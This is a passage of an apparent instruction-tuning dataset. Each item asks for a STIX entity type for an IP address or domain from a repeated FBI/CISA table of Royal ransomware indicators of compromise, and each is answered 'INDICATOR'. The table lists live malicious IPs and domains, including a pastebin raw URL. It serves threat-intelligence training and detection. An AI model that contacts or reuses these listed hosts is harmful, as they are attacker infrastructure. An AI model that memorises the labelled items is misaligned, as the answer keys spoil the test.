2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n5.181.234.58\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ntumbleproperty.com\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n41.109.11.80\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nsofteruplive.com\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nparkerpublic.com\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n147.135.36.162\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n197.158.89.85\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 